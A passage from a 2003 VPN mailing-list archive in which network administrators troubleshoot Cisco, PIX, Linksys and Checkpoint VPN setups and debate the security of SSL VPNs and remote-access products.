Garrett Sinfield. > > > > > > > > _________________________________________________________________ > Add photos to your messages with MSN 8. Get 2 months FREE*. > http://join.msn.com/?page=features/featuredemail > > _______________________________________________ > VPN mailing list > VPN at lists.shmoo.com > http://lists.shmoo.com/mailman/listinfo/vpn __________________________________ Do you Yahoo!? The New Yahoo! Search - Faster. Easier. Bingo. http://search.yahoo.com From dmickovic at verio.net Sun Apr 27 12:13:04 2003 From: dmickovic at verio.net (Dragan Mickovic) Date: Sun, 27 Apr 2003 12:13:04 -0400 Subject: [VPN] vpn between SSH Sentinel and Cisco 2600 Message-ID: <20030427121304.A75911@verio.net> I'm trying to setup VPN between a unit with ssh sentinel and cisco 2600, but for some reason ssh sentinel doesn't send the xauth information (username/password). I've made sure it is correctly checked and has the correct info entered (user/pass), but still get the following: --------------------------------------------------------- 2d20h: ISAKMP (0:0): received packet from (N) NEW SA 2d20h: ISAKMP: local port 500, remote port 500 2d20h: ISAKMP (0:1): Setting client config settings 8273CF74 2d20h: ISAKMP (0:1): (Re)Setting client xauth list userlogin and state 2d20h: ISAKMP: Created a peer node for 2d20h: ISAKMP: Locking struct 8273CF74 from crypto_ikmp_config_initialize_sa 2d20h: ISAKMP (0:1): processing SA payload. message ID = 0 2d20h: ISAKMP (0:1): found peer pre-shared key matching 2d20h: ISAKMP (0:1): Checking ISAKMP transform 0 against priority 1 policy 2d20h: ISAKMP: encryption DES-CBC 2d20h: ISAKMP: hash MD5 2d20h: ISAKMP: auth pre-share 2d20h: ISAKMP: default group 2 2d20h: ISAKMP: life type in seconds 2d20h: ISAKMP: life duration (basic) of 14400 2d20h: ISAKMP (0:1): atts are acceptable. Next payload is 0 2d20h: ISAKMP (0:1): processing vendor id payload 2d20h: ISAKMP (0:1): processing vendor id payload 2d20h: ISAKMP (0:1): processing vendor id payload 2d20h: ISAKMP (0:1): processing vendor id payload 2d20h: ISAKMP (0:1): SA is doing pre-shared key authentication using id type ID_IPV4_ADDR 2d20h: ISAKMP (0:1): sending packet to (R) MM_SA_SETUP 2d20h: ISAKMP (0:1): received packet from (R) MM_SA_SETUP 2d20h: ISAKMP (0:1): processing KE payload. message ID = 0 2d20h: ISAKMP (0:1): processing NONCE payload. message ID = 0 2d20h: ISAKMP (0:1): found peer pre-shared key matching 2d20h: ISAKMP (0:1): SKEYID state generated 2d20h: ISAKMP (0:1): sending packet to (R) MM_KEY_EXCH 2d20h: ISAKMP (0:1): received packet from (R) MM_KEY_EXCH 2d20h: ISAKMP (0:1): processing ID payload. message ID = 0 2d20h: ISAKMP (0:1): processing HASH payload. message ID = 0 2d20h: ISAKMP (0:1): processing NOTIFY INITIAL_CONTACT protocol 1 spi 0, message ID = 0, sa = 8273C00C 2d20h: ISAKMP (0:1): SA has been authenticated with 2d20h: ISAKMP (1): ID payload next-payload : 8 type : 1 protocol : 17 port : 500 length : 8 2d20h: ISAKMP (1): Total payload length: 12 2d20h: ISAKMP (0:1): sending packet to (R) CONF_XAUTH 2d20h: ISAKMP (0:1): received packet from (R) CONF_XAUTH 2d20h: ISAKMP (0:1): (Re)Setting client xauth list userlogin and state 2d20h: ISAKMP (0:1): Need XAUTH 2d20h: ISAKMP: got callback 1 2d20h: ISAKMP (0:1): initiating peer config to . ID = -1240066450 2d20h: ISAKMP (0:1): sending packet to (R) CONF_XAUTH 2d20h: ISAKMP (0:1): received packet from (R) CONF_XAUTH 2d20h: ISAKMP (0:1): processing transaction payload from . message ID = -1240066450 2d20h: ISAKMP: configuration header expected in config message 2d20h: ISAKMP (0:1): deleting node -1240066450 error FALSE reason "" 2d20h: ISAKMP (0:1): peer does not do paranoid keepalives. 2d20h: ISAKMP (0:1): deleting SA reason "Needed xauth" state (R) CONF_XAUTH (peer ) input queue 0 2d20h: ISAKMP: Unlocking struct 8273CF74 on return of attributes 2d20h: ISAKMP (0:1): deleting node 938348426 error TRUE reason "Needed xauth" 2d20h: ISAKMP (0:1): peer does not do paranoid keepalives. 2d20h: ISAKMP (0:1): received packet from (R) MM_NO_STATE 2d20h: ISAKMP (0:1): received packet from (R) MM_NO_STATE ---------------------------------------------------------------- and here is the router config: ---------------------------------------------------------------- aaa new-model aaa authentication login userlogin group tacacs+ aaa authorization network grouplogin group tacacs+ ! ip subnet-zero ! ! ip audit notify log ip audit po max-events 100 ! crypto isakmp policy 1 hash md5 authentication pre-share group 2 lifetime 14400 crypto isakmp key cisco address 0.0.0.0 0.0.0.0 crypto isakmp client configuration address-pool local REMOTE ! ! crypto ipsec transform-set ONE esp-des esp-md5-hmac ! crypto dynamic-map MAP 10 set transform-set ONE ! ! crypto map INTMAP client authentication list userlogin crypto map INTMAP isakmp authorization list grouplogin crypto map INTMAP client configuration address initiate crypto map INTMAP client configuration address respond crypto map INTMAP 1 ipsec-isakmp dynamic MAP discover ! interface Loopback1 ip address 192.168.2.1 255.255.255.255 ! interface Ethernet0/0 ip address 255.255.255.0 ip nat outside half-duplex crypto map INTMAP ! interface Serial0/0 no ip address shutdown ! interface Ethernet0/1 ip address 192.168.1.101 255.255.255.0 ip nat inside half-duplex ! interface Serial0/1 no ip address shutdown ! ip local pool REMOTE 192.168.2.50 192.168.2.100 ip nat inside source list 20 interface Ethernet0/0 overload ------------------------------------- is it something with the router config or ssh sentinel setting? thanks dragan -- Dragan Mickovic UNIX Systems Administrator NTT/Verio x.4012 From justinp at adapt.iinet.net.au Mon Apr 28 05:57:57 2003 From: justinp at adapt.iinet.net.au (Justin Pember) Date: Mon, 28 Apr 2003 17:57:57 +0800 Subject: [VPN] Linksys BEFVP41 Message-ID: <000001c30d6c$a5614430$6400a8c0@uptown> Any input regarding this situation would be greatly appreciated. :-) I have two sites, one with a DSL connection with a static IP address, the other with a microwave connection also with a static public IP. A VPN needs to be set up to provide LAN to LAN communication between the sites, as well as allow several remote users to connect to one of the LAN's via a VPN. Would the Linksys BEFVP41 be suitable for this situation with the following considerations? 1) A server on the LAN that is on the microwave connection needs to provide web and mail services to the internet. Is it easy to setup port forwarding to the server so it can still provide these public services from inside the private network with the BEFVP41? The site only has the single public IP address. 2) Several more sites will eventually be added that will also need a LAN to LAN connection. The BEFVP41 is capable of 70 VPN tunnels, but can it do multiple end to end type tunnels between LAN's and route any internal traffic to any other point on one of the other LAN's? 3) The BEFVP41 is advertised for cable or DSL connections. Will there be any problems using it on the microwave connection at one of the sites? The microwave connection is a reliable connection to the internet and uses a standard Ethernet connection. 4) Does the BEFVP41 only provide a NAT firewall or does it also provide an SPI firewall like the similar BEFSX41? 5) Is this model easy to setup with multiple VPN tunnels connecting the LAN's together, and is it able to reliably re-establish any dropped connections without assistance. Thanks in advance for any help! -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.shmoo.com/pipermail/vpn/attachments/20030428/ae7a5b0e/attachment.htm From pjacob at ftmc.com Mon Apr 28 15:13:35 2003 From: pjacob at ftmc.com (Pete Jacob) Date: 28 Apr 2003 15:13:35 -0400 Subject: [VPN] Linksys BEFVP41 In-Reply-To: <000001c30d6c$a5614430$6400a8c0@uptown> References: <000001c30d6c$a5614430$6400a8c0@uptown> Message-ID: <1051557215.5488.15.camel@Pete.Ftmc.Com> On Mon, 2003-04-28 at 05:57, Justin Pember wrote: > Any input regarding this situation would be greatly appreciated. J > > > > I have two sites, one with a DSL connection with a static IP address, > the other with a microwave connection also with a static public IP. A > VPN needs to be set up to provide LAN to LAN communication between the > sites, as well as allow several remote users to connect to one of the > LAN?s via a VPN. > Would the Linksys BEFVP41 be suitable for this situation with the > following considerations? the BEFVP41 can not be the endpoint of a IpSec tunnel... it is a client-less VPN start point... > 1) A server on the LAN that is on the microwave connection needs to > provide web and mail services to the internet. Is it easy to setup > port forwarding to the server so it can still provide these public > services from inside the private network with the BEFVP41? The site > only has the single public IP address. Unless you have very high budget restraints.. I would not use a the BEFVP41 for something like that... it is very inexpensive, but is very low end... there is no way to actually save your configuration... Linksys support is not real good... if you have a problem, the suggest fix is to press the re-set button and start over. > 2) Several more sites will eventually be added that will also need a > LAN to LAN connection. The BEFVP41 is capable of 70 VPN tunnels, but > can it do multiple end to end type tunnels between LAN?s and route any > internal traffic to any other point on one of the other LAN?s? not really, you need a higher end router/firewall/vpn server at your main site... I suggest looking at some of the Netscreen products... > 3) The BEFVP41 is advertised for cable or DSL connections. Will there > be any problems using it on the microwave connection at one of the > sites? The microwave connection is a reliable connection to the > internet and uses a standard Ethernet connection. no, I use it for this as well for some Breezecom DS.11 units... I believe the port is just a 10 meg port. > 4) Does the BEFVP41 only provide a NAT firewall or does it also > provide an SPI firewall like the similar BEFSX41? no, it is a very basic firewall, and some of the documentation says that you should even run something like zone alarm as well... (yuck) if your getting hacked there is no screen, or output that will let you know of any attempted hacks or port scans or anything. > 5) Is this model easy to setup with multiple VPN tunnels connecting > the LAN?s together, and is it able to reliably re-establish any > dropped connections without assistance. I have 7 remote offices using BEFVP41's that connect into a Netscreen appliance, over a 802.11b wireless network... it works pretty well... sometimes if you connect to the WAN interface for configuration the BEFVP41's lookup, and we have to physically power them off... the DHCP in the units don't work well... I would invest higher on the head end, and lower on the client site... (just my option) you can get some Netscreen devices, pretty reasonable with support... I would say that they are way above a Linksys, d-link, or kmart brand, without getting into something like a Cisco pix. > Thanks in advance for any help! Pete Jacob Fisher-Titus Medical Center -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.shmoo.com/pipermail/vpn/attachments/20030428/f0af76af/attachment.htm -------------- next part -------------- A non-text attachment was scrubbed... Name: 309575.gif Type: image/gif Size: 4747 bytes Desc: not available Url : http://lists.shmoo.com/pipermail/vpn/attachments/20030428/f0af76af/attachment.gif From vincent.bartsch at cubic.com Mon Apr 28 22:15:08 2003 From: vincent.bartsch at cubic.com (Bartsch, Vincent) Date: Mon, 28 Apr 2003 19:15:08 -0700 Subject: [VPN] SSL VPN Message-ID: I am researching everything about SSL and it's use as a VPN solution. I am aware of some of it's limitations but I was wondering has anyone tried this: allowed a SSL connection to a web server that lets the user to open a connection to a terminal server. Or can it be configured to connect to a terminal server via a SSL connection directly? Has anyone tried this, were they successful? Again, I am just researching this thought. Any word back on this would be most appreciated, thanks. Vincent -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.shmoo.com/pipermail/vpn/attachments/20030428/58bf2e1d/attachment.htm From tbird at precision-guesswork.com Mon Apr 28 22:36:04 2003 From: tbird at precision-guesswork.com (Tina Bird) Date: Tue, 29 Apr 2003 02:36:04 +0000 (GMT) Subject: [VPN] SSL VPN In-Reply-To: Message-ID: <20030429023323.S53613-100000@sisyphus.iocaine.com> On Mon, 28 Apr 2003, Bartsch, Vincent wrote: > I am researching everything about SSL and it's use as a VPN solution. I am > aware of some of > it's limitations but I was wondering has anyone tried this: allowed a SSL > connection to a web > server that lets the user to open a connection to a terminal server. Or can > it be configured to > connect to a terminal server via a SSL connection directly? Has anyone tried > this, were they > successful? Hi Vincent -- I don't have anything that will be immediately useful, but We had a bit of a discussion about SSL-based VPNs. The responses to my original posting included a lot of experience the writer's had had, so it might be very useful for you. http://vpn.shmoo.com -- click on SSL VPNs & Other Misc cheers -- tbird -- It's not the size of the key, it's the implementation of the algorithm... -- Natasha Smith http://www.shmoo.com/~tbird Log Analysis http://www.loganalysis.org VPN http://vpn.shmoo.com Security Alerts http://securecomputing.stanford.edu/alert.html From alex at cipherica.com Mon Apr 28 22:58:54 2003 From: alex at cipherica.com (Alex Pankratov) Date: Mon, 28 Apr 2003 19:58:54 -0700 Subject: [VPN] SSL VPN In-Reply-To: References: Message-ID: <3EADEA6E.5070108@cipherica.com> Vincent, coincidentally I was looking at securing TS traffic just last week, so as an alternative you may want to look at MS own article: http://support.microsoft.com/?kbid=315055, "HOW TO: Use IPSec Policy to Secure Terminal Services Communications in Windows 2000". This is not much, it does not talk on how to setup authentication or about NAT traversal, etc, etc. Amongst SSL-based solutions, http://stunnel.org is the first thing that comes to mind. I dont see any reason why it should not work, so I'd try it first. On the more general topic, I recently wrote a small article about very simple aspect of TCP-based VPNs, which can seriously undermine robustness of the former. The issue worths considering depending on your deployment scenario. http://www.cipherica.com/papers/tcp-vpn-dos.pdf cheers, alex. Bartsch, Vincent wrote: > I am researching everything about SSL and it's use as a VPN solution. I > am aware of some of > it's limitations but I was wondering has anyone tried this: allowed a > SSL connection to a web > server that lets the user to open a connection to a terminal server. Or > can it be configured to > connect to a terminal server via a SSL connection directly? Has anyone > tried this, were they > successful? > > Again, I am just researching this thought. Any word back on this would > be most appreciated, > thanks. > > Vincent > From shannong at texas.net Mon Apr 28 23:22:51 2003 From: shannong at texas.net (shannong) Date: Mon, 28 Apr 2003 22:22:51 -0500 Subject: [VPN] Complete VPN access to all PIX interfaces In-Reply-To: Message-ID: <001401c30dfe$a0c6e730$0101a8c0@ASTEROID> You need to remove the command [sysopt connect permit-ipsec]. This tells the Pix to bypass all ACLs for traffic incoming from VPN tunnels. Instead, use an ACL on the interface where the VPN is terminated (outside in your case) to allow exactly the traffic you want. Keep in mind the command is global, and you'll need to define ACEs that allow all desired VPN traffic for all tunnels. -Shannon -----Original Message----- From: vpn-admin at lists.shmoo.com [mailto:vpn-admin at lists.shmoo.com] On Behalf Of jmondaca at entelsa.entelnet.bo Sent: Thursday, April 24, 2003 11:20 AM To: vpn at lists.shmoo.com; vpn-admin at lists.shmoo.com Subject: [VPN] Complete VPN access to all PIX interfaces I have a PIX 6.2 with 6 interfaces and VPN client 3.0. I have configured the firewall to permit a VPN connection using the following conf access-list 100 permit ip x.x.x.x 255.255.255.0 y.y.y.y 255.255.255.0 nat (dmz2) 0 access-list 100 sysopt connection permit-ipsec crypto ipsec transform-set myset esp-3des esmp-md5-hamc crypto dynamic-map dynmap 30 set transform-set myset crypto map newmap 20 ipsec-isakmp dynamic dynmap crypto map newmap interface outside * and the configuration of the vpngroup and isakmp The problem is that I only want the vpn client access my x.x.x.x network in dmz2 but the VPN client can access all the computers in the internal, dmz1, dmz3, etc (all the interfaces). Thanks in advance. _______________________________________ Jorge Mondaca Gerencia Seguridad Corporativa (591) 2-2313030 ext 2021 (591) 72029832 _______________________________________________ VPN mailing list VPN at lists.shmoo.com http://lists.shmoo.com/mailman/listinfo/vpn From shannong at texas.net Mon Apr 28 23:28:22 2003 From: shannong at texas.net (shannong) Date: Mon, 28 Apr 2003 22:28:22 -0500 Subject: [VPN] SSL VPN In-Reply-To: Message-ID: <001501c30dff$663f4570$0101a8c0@ASTEROID> I've done quite of bit of testing on this. You can move TS to a new port (443/80), but then that's not really a proxy. You can use proxies for RDP and have the traffic tunneled over 443. I recommend this approach so that only authenticated users have access to RDP/Citrix server rather than the Internet at large. However, I recommend against using SSL based VPNs for network layer access as they ignore client side security. Do you really want users connecting from random PCs on the Internet that already have Trojans/backdoors installed? Then that hacked PC gives some other party full access to your network? Perhaps from a coffee bar where they forget to log off and walk away giving an entire city access to your internal network? For remote access, stick with IPSec so that you can enforce strong authentication, firewall rules, and verify the presence of virus scanners. -S -----Original Message----- From: vpn-admin at lists.shmoo.com [mailto:vpn-admin at lists.shmoo.com] On Behalf Of Bartsch, Vincent Sent: Monday, April 28, 2003 9:15 PM To: 'vpn at lists.shmoo.com' Subject: [VPN] SSL VPN I am researching everything about SSL and it's use as a VPN solution. I am aware of some of it's limitations but I was wondering has anyone tried this: allowed a SSL connection to a web server that lets the user to open a connection to a terminal server. Or can it be configured to connect to a terminal server via a SSL connection directly? Has anyone tried this, were they successful? Again, I am just researching this thought. Any word back on this would be most appreciated, thanks. Vincent -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.shmoo.com/pipermail/vpn/attachments/20030428/440daf23/attachment.htm From ghezzi_silvia at yahoo.de Tue Apr 29 03:26:54 2003 From: ghezzi_silvia at yahoo.de (silvia ghezzi) Date: Tue, 29 Apr 2003 00:26:54 -0700 (PDT) Subject: [VPN] VPN on Cisco PIX Message-ID: <20030429072654.21106.qmail@web21010.mail.yahoo.com> Hello, I have enabled a PPTP VPN to my CISCO PIX, but I cannot find the way to filer the public source IP address to establish VPN with PIX, so at the moment everybody can create a VPN with us and we don't want this. Is there a way to prevent this? Many thanks Regards Silvia __________________________________ Do you Yahoo!? The New Yahoo! Search - Faster. Easier. Bingo. http://search.yahoo.com From safieradam at hotmail.com Tue Apr 29 05:03:07 2003 From: safieradam at hotmail.com (safieradam) Date: Tue, 29 Apr 2003 05:03:07 -0400 Subject: [VPN] SSL VPN References: <20030429023323.S53613-100000@sisyphus.iocaine.com> Message-ID: Check out www.GoToMyPC.com. There are several similar products but this one is advertising heavily where I tend to go. Adam ----- Original Message ----- From: "Tina Bird" To: "Bartsch, Vincent" Cc: Sent: Monday, April 28, 2003 10:36 PM Subject: Re: [VPN] SSL VPN > On Mon, 28 Apr 2003, Bartsch, Vincent wrote: > > > I am researching everything about SSL and it's use as a VPN solution. I am > > aware of some of > > it's limitations but I was wondering has anyone tried this: allowed a SSL > > connection to a web > > server that lets the user to open a connection to a terminal server. Or can > > it be configured to > > connect to a terminal server via a SSL connection directly? Has anyone tried > > this, were they > > successful? > > Hi Vincent -- I don't have anything that will be immediately useful, but > We had a bit of a discussion about SSL-based VPNs. The responses to my > original posting included a lot of experience the writer's had had, so it > might be very useful for you. > > http://vpn.shmoo.com -- click on SSL VPNs & Other Misc > > cheers -- tbird > > -- > It's not the size of the key, it's the implementation of the algorithm... > > -- Natasha Smith > > http://www.shmoo.com/~tbird > Log Analysis http://www.loganalysis.org > VPN http://vpn.shmoo.com > Security Alerts http://securecomputing.stanford.edu/alert.html > > _______________________________________________ > VPN mailing list > VPN at lists.shmoo.com > http://lists.shmoo.com/mailman/listinfo/vpn > From pjacob at ftmc.com Tue Apr 29 08:24:00 2003 From: pjacob at ftmc.com (Pete Jacob) Date: 29 Apr 2003 08:24:00 -0400 Subject: [VPN] SSL VPN In-Reply-To: References: Message-ID: <1051619039.2114.8.camel@Pete.Ftmc.Com> On Mon, 2003-04-28 at 22:15, Bartsch, Vincent wrote: > I am researching everything about SSL and it's use as a VPN solution. > I am aware of some of > it's limitations but I was wondering has anyone tried this: allowed a > SSL connection to a web > server that lets the user to open a connection to a terminal server. > Or can it be configured to > connect to a terminal server via a SSL connection directly? Has anyone > tried this, were they > successful? > > Again, I am just researching this thought. Any word back on this would > be most appreciated, > thanks. > > Vincent > hello Vincent, one thing you can try is Netilla, it is an appliance running a hardened version of Apache, and Linux... it is a SSL appliance to connect to your internal machines, supposedly they are the only manufau. to be licensed from MicroSloth to reverse engineer MS's RDP protocol... This thing is pretty sweet, and would be worth your time to look into... I had a Netilla rep. come on site to do a demo... I have some contacts if you'd be interested... it is priced pretty cheep... basically you get the box for free, and you just pay per user... the same amount as if you were paying for individual Citrix licenses... they even have 30 day demo's that do not require a contingent purchase order... It's a very nice way to web enable many non-web applications thru a common secure web interface. Pete Jacob Fisher-Titus Medical Center -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.shmoo.com/pipermail/vpn/attachments/20030429/f3238725/attachment.htm -------------- next part -------------- A non-text attachment was scrubbed... Name: 309575.gif Type: image/gif Size: 4747 bytes Desc: not available Url : http://lists.shmoo.com/pipermail/vpn/attachments/20030429/f3238725/attachment.gif From TSimons at Delphi-Tech.com Tue Apr 29 12:57:54 2003 From: TSimons at Delphi-Tech.com (TSimons at Delphi-Tech.com) Date: Tue, 29 Apr 2003 12:57:54 -0400 Subject: [VPN] PIX <-> SEF S2S VPN Message-ID: <880E60DA7286AB4CBEECB01B169A63BD0379D41E@NJ-2K-Email1.delphi-tech.com> Hello All. I'm a nubie to this list, sorry for any faux pas... I'm wondering what success rate others have had with the new Cisco PIX v6.3 with S2S vpn tunnels to non-PIX partners. We have multiple SEF (Symantec Enterprise Firewall) to PIX VPNs. Prior to IOS v6.22.120 and v6.3 if the tunnels would time out one side or the other has to be rebooted because of an alleged memory leak on the PIX side. Any input is greatly appreciated Thanks, ~Todd __________________________________ Todd M. Simons Senior MIS Engineer Dell Tier 1 PA Technician Delphi Technology, Inc. New Brunswick, NJ God Bless America and those who defend her. From shannong at texas.net Tue Apr 29 20:26:45 2003 From: shannong at texas.net (shannong) Date: Tue, 29 Apr 2003 19:26:45 -0500 Subject: [VPN] SSL VPN In-Reply-To: Message-ID: <003101c30eaf$31625760$0101a8c0@ASTEROID> >From a security stand point, GoToMyPC is a really bad idea. Providing a third-party with unadulterated access to machines on your internal network is not taking your internal security very serious. In addition to giving that provider with access, when they get hacked this perpetrator will have access to your PCs as well. GoToMyPC has HIPAA and GLBA issues which make it a legal issue in healthcare and finance, respectively. -----Original Message----- From: vpn-admin at lists.shmoo.com [mailto:vpn-admin at lists.shmoo.com] On Behalf Of safieradam Sent: Tuesday, April 29, 2003 4:03 AM To: Tina Bird; Bartsch, Vincent Cc: vpn at lists.shmoo.com Subject: Re: [VPN] SSL VPN Check out www.GoToMyPC.com. There are several similar products but this one is advertising heavily where I tend to go. Adam ----- Original Message ----- From: "Tina Bird" To: "Bartsch, Vincent" Cc: Sent: Monday, April 28, 2003 10:36 PM Subject: Re: [VPN] SSL VPN > On Mon, 28 Apr 2003, Bartsch, Vincent wrote: > > > I am researching everything about SSL and it's use as a VPN solution. I am > > aware of some of > > it's limitations but I was wondering has anyone tried this: allowed a SSL > > connection to a web > > server that lets the user to open a connection to a terminal server. Or can > > it be configured to > > connect to a terminal server via a SSL connection directly? Has anyone tried > > this, were they > > successful? > > Hi Vincent -- I don't have anything that will be immediately useful, but > We had a bit of a discussion about SSL-based VPNs. The responses to my > original posting included a lot of experience the writer's had had, so it > might be very useful for you. > > http://vpn.shmoo.com -- click on SSL VPNs & Other Misc > > cheers -- tbird > > -- > It's not the size of the key, it's the implementation of the algorithm... > > -- Natasha Smith > > http://www.shmoo.com/~tbird > Log Analysis http://www.loganalysis.org > VPN http://vpn.shmoo.com > Security Alerts http://securecomputing.stanford.edu/alert.html > > _______________________________________________ > VPN mailing list > VPN at lists.shmoo.com > http://lists.shmoo.com/mailman/listinfo/vpn > _______________________________________________ VPN mailing list VPN at lists.shmoo.com http://lists.shmoo.com/mailman/listinfo/vpn From shannong at texas.net Tue Apr 29 20:30:37 2003 From: shannong at texas.net (shannong) Date: Tue, 29 Apr 2003 19:30:37 -0500 Subject: [VPN] SSL VPN In-Reply-To: <1051619039.2114.8.camel@Pete.Ftmc.Com> Message-ID: <003201c30eaf$bb6b6870$0101a8c0@ASTEROID> I checked out Netilla as well. It seemed attractive, but we were looking for a solution that provided network layer access for fat-client applications on laptops in addition to web-browser access. Also, the graphic resolution is low (ala RDP), so you can't use it for hi-res graphic applications. -----Original Message----- From: vpn-admin at lists.shmoo.com [mailto:vpn-admin at lists.shmoo.com] On Behalf Of Pete Jacob Sent: Tuesday, April 29, 2003 7:24 AM To: Bartsch, Vincent Cc: 'vpn at lists.shmoo.com' Subject: Re: [VPN] SSL VPN On Mon, 2003-04-28 at 22:15, Bartsch, Vincent wrote: I am researching everything about SSL and it's use as a VPN solution. I am aware of some of it's limitations but I was wondering has anyone tried this: allowed a SSL connection to a web server that lets the user to open a connection to a terminal server. Or can it be configured to connect to a terminal server via a SSL connection directly? Has anyone tried this, were they successful? Again, I am just researching this thought. Any word back on this would be most appreciated, thanks. Vincent hello Vincent, one thing you can try is Netilla, it is an appliance running a hardened version of Apache, and Linux... it is a SSL appliance to connect to your internal machines, supposedly they are the only manufau. to be licensed from MicroSloth to reverse engineer MS's RDP protocol... This thing is pretty sweet, and would be worth your time to look into... I had a Netilla rep. come on site to do a demo... I have some contacts if you'd be interested... it is priced pretty cheep... basically you get the box for free, and you just pay per user... the same amount as if you were paying for individual Citrix licenses... they even have 30 day demo's that do not require a contingent purchase order... It's a very nice way to web enable many non-web applications thru a common secure web interface. Pete Jacob Fisher-Titus Medical Center -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.shmoo.com/pipermail/vpn/attachments/20030429/d2e27392/attachment.htm -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: image/gif Size: 4747 bytes Desc: not available Url : http://lists.shmoo.com/pipermail/vpn/attachments/20030429/d2e27392/attachment.gif From shannong at texas.net Tue Apr 29 20:33:59 2003 From: shannong at texas.net (shannong) Date: Tue, 29 Apr 2003 19:33:59 -0500 Subject: [VPN] VPN on Cisco PIX In-Reply-To: <20030429072654.21106.qmail@web21010.mail.yahoo.com> Message-ID: <003801c30eb0$33b52b90$0101a8c0@ASTEROID> No. VPDN cannot be restricted by IP on the Pix. Instead, you'll need to use an ACL on the router in front. You can do real VPNs using IPSec and specify the IPs that can have access by defining their pre-shared keys for IKE. All others will fail. -Shannon -----Original Message----- From: vpn-admin at lists.shmoo.com [mailto:vpn-admin at lists.shmoo.com] On Behalf Of silvia ghezzi Sent: Tuesday, April 29, 2003 2:27 AM To: vpn at lists.shmoo.com Subject: [VPN] VPN on Cisco PIX Hello, I have enabled a PPTP VPN to my CISCO PIX, but I cannot find the way to filer the public source IP address to establish VPN with PIX, so at the moment everybody can create a VPN with us and we don't want this. Is there a way to prevent this? Many thanks Regards Silvia __________________________________ Do you Yahoo!? The New Yahoo! Search - Faster. Easier. Bingo. http://search.yahoo.com _______________________________________________ VPN mailing list VPN at lists.shmoo.com http://lists.shmoo.com/mailman/listinfo/vpn From guy.raymakers at eds.com Wed Apr 30 06:50:04 2003 From: guy.raymakers at eds.com (Raymakers, Guy) Date: Wed, 30 Apr 2003 11:50:04 +0100 Subject: [VPN] Checkpoint NG FP2 Message-ID: I'm trying to setup a VPN between two Nokia IP350's running Checkpoint NG FP2. I've used the internal_ca to generate certificates on both systems. When the two system try to establish the IPsec connection, I only see in the logs 'invalid certificate' and certificate validation timeouts. Any ideas and is there a possibility to use pre-shared key's (between two fully managed FP2 checkpoints)? Many thanks, Guy -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.shmoo.com/pipermail/vpn/attachments/20030430/10f4b445/attachment.htm From roger.qian at sholodge.com Wed Apr 30 11:36:45 2003 From: roger.qian at sholodge.com (Roger Qian) Date: Wed, 30 Apr 2003 10:36:45 -0500 Subject: [VPN] SSL VPN Message-ID: How is pcANYWHERE? smae as GoToMyPc from a security stand point? Thanks, Roger -----Original Message----- From: shannong [mailto:shannong at texas.net] Sent: Tuesday, April 29, 2003 7:27 PM Cc: vpn at lists.shmoo.com Subject: RE: [VPN] SSL VPN >From a security stand point, GoToMyPC is a really bad idea. Providing a third-party with unadulterated access to machines on your internal network is not taking your internal security very serious. In addition to giving that provider with access, when they get hacked this perpetrator will have access to your PCs as well. GoToMyPC has HIPAA and GLBA issues which make it a legal issue in healthcare and finance, respectively. -----Original Message----- From: vpn-admin at lists.shmoo.com [mailto:vpn-admin at lists.shmoo.com] On Behalf Of safieradam Sent: Tuesday, April 29, 2003 4:03 AM To: Tina Bird; Bartsch, Vincent Cc: vpn at lists.shmoo.com Subject: Re: [VPN] SSL VPN Check out www.GoToMyPC.com. There are several similar products but this one is advertising heavily where I tend to go. Adam ----- Original Message ----- From: "Tina Bird" To: "Bartsch, Vincent" Cc: Sent: Monday, April 28, 2003 10:36 PM Subject: Re: [VPN] SSL VPN > On Mon, 28 Apr 2003, Bartsch, Vincent wrote: > > > I am researching everything about SSL and it's use as a VPN solution. I am > > aware of some of > > it's limitations but I was wondering has anyone tried this: allowed a SSL > > connection to a web > > server that lets the user to open a connection to a terminal server. Or can > > it be configured to > > connect to a terminal server via a SSL connection directly? Has anyone tried > > this, were they > > successful? > > Hi Vincent -- I don't have anything that will be immediately useful, but > We had a bit of a discussion about SSL-based VPNs. The responses to my > original posting included a lot of experience the writer's had had, so it > might be very useful for you. > > http://vpn.shmoo.com -- click on SSL VPNs & Other Misc > > cheers -- tbird > > -- > It's not the size of the key, it's the implementation of the algorithm... > > -- Natasha Smith > > http://www.shmoo.com/~tbird > Log Analysis http://www.loganalysis.org > VPN http://vpn.shmoo.com > Security Alerts http://securecomputing.stanford.edu/alert.html > > _______________________________________________ > VPN mailing list > VPN at lists.shmoo.com > http://lists.shmoo.com/mailman/listinfo/vpn > _______________________________________________ VPN mailing list VPN at lists.shmoo.com http://lists.shmoo.com/mailman/listinfo/vpn _______________________________________________ VPN mailing list VPN at lists.shmoo.com http://lists.shmoo.com/mailman/listinfo/vpn From djdawso at qwest.com Wed Apr 30 13:09:39 2003 From: djdawso at qwest.com (Dana J. Dawson) Date: Wed, 30 Apr 2003 12:09:39 -0500 Subject: [VPN] VPN on Cisco PIX References: <003801c30eb0$33b52b90$0101a8c0@ASTEROID> Message-ID: <3EB00353.7060705@qwest.com> Actually, you can, but you have to remove the "sysopt connection permit-pptp" command that is usually used. In this case, you have to permit all the incoming traffic to the PIX with an access-list (or conduit, I suppose), including the PPTP traffic (GRE and TCP/1723). Since you're using an access-list to allow that traffic, you can also restrict the source, which is what you want. HTH Dana -- Dana J. Dawson djdawso at qwest.com Senior Staff Engineer CCIE #1937 Qwest Communications (612) 664-3364 600 Stinson Blvd., Suite 1S (612) 664-4779 (FAX) Minneapolis MN 55413-2620 "Hard is where the money is." shannong wrote: > No. VPDN cannot be restricted by IP on the Pix. Instead, you'll need > to use an ACL on the router in front. You can do real VPNs using IPSec > and specify the IPs that can have access by defining their pre-shared > keys for IKE. All others will fail. > > -Shannon > > -----Original Message----- > From: vpn-admin at lists.shmoo.com [mailto:vpn-admin at lists.shmoo.com] On > Behalf Of silvia ghezzi > Sent: Tuesday, April 29, 2003 2:27 AM > To: vpn at lists.shmoo.com > Subject: [VPN] VPN on Cisco PIX > > Hello, > > I have enabled a PPTP VPN to my CISCO PIX, but I > cannot find the way to filer the public source IP > address to establish VPN with PIX, so at the moment > everybody can create a VPN with us and we don't want > this. > > Is there a way to prevent this? > > Many thanks > Regards > > Silvia From TSimons at Delphi-Tech.com Wed Apr 30 14:37:47 2003 From: TSimons at Delphi-Tech.com 